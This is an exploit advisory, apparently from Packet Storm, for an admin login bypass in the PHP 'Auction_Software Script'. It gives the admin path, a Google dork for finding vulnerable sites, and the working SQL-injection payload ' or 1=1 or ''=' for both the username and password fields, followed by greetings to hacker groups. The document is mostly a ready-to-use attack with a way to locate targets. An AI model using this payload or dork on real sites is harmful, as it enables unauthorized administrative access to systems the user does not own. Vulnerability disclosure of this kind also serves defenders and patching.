Auction_Software Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3b20b15e98207b66b4d0f4a174b5aad09f3cb644004d37acb878f165fa487c001-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Auction_Software Script Admin Login Bypass vulnerability
vendor URL :http://www.brotherscripts.com/
Price: $24.95
Author : altbta <l_9[at]hotmail.com>
dork : "PHPAuction GPL Enhanced V2.51 by AuctionCode.com"
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Xploit : Auth Bypass
Demo :
http://www.site.com/demos/Auction_Software/admin/
UserName: ' or 1=1 or ''='
Password: ' or 1=1 or ''='
1-=-=-=-=-=-=-=-=-=-=-=-=-=-= (altbta) =-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
greetz to : RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V !
V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & R3d-D3v!L & MN9
xp10.me/xp10 & v4-team.com/cc
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed